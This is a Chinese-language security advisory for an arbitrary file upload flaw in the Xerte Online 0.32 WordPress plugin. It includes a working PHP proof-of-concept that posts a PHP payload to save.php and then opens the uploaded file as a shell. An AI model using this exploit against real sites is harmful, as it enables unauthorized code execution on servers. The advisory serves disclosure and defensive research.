发布日期：2012-12-30
更新日期：2013-01-04

受影响系统：

WordPress Xerte Online 0.32

描述：

---

BUGTRAQ  ID: 57098

Xerte Online for WordPress是基于服务器的内容作者的工具集。

Xerte Online for WordPress内存在安全漏洞，wp-content/plugins/xerte-online/xertefiles/save.php允许上传带有任意扩展名的文件到webroot内的文件夹，通过提交恶意的PHP脚本，可导致任意PHP代码执行。

<*来源：Sammy Forgit
  
  链接：http://www.securelist.com/en/advisories/51691
        http://packetstormsecurity.com/files/119220/wpxerteonline-shell.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Exploit :

PostShell.php
<?php

$code = "<? phpinfo(); ?>";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
        'filedata'=>"$code"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Shell Access :
http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php


# Site : 1337day[.]com Inj3ct0r Exploit Database

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://wordpress.org/extend/plugins/xerte-online/

浏览次数：5351
严重程度：0（网友投票）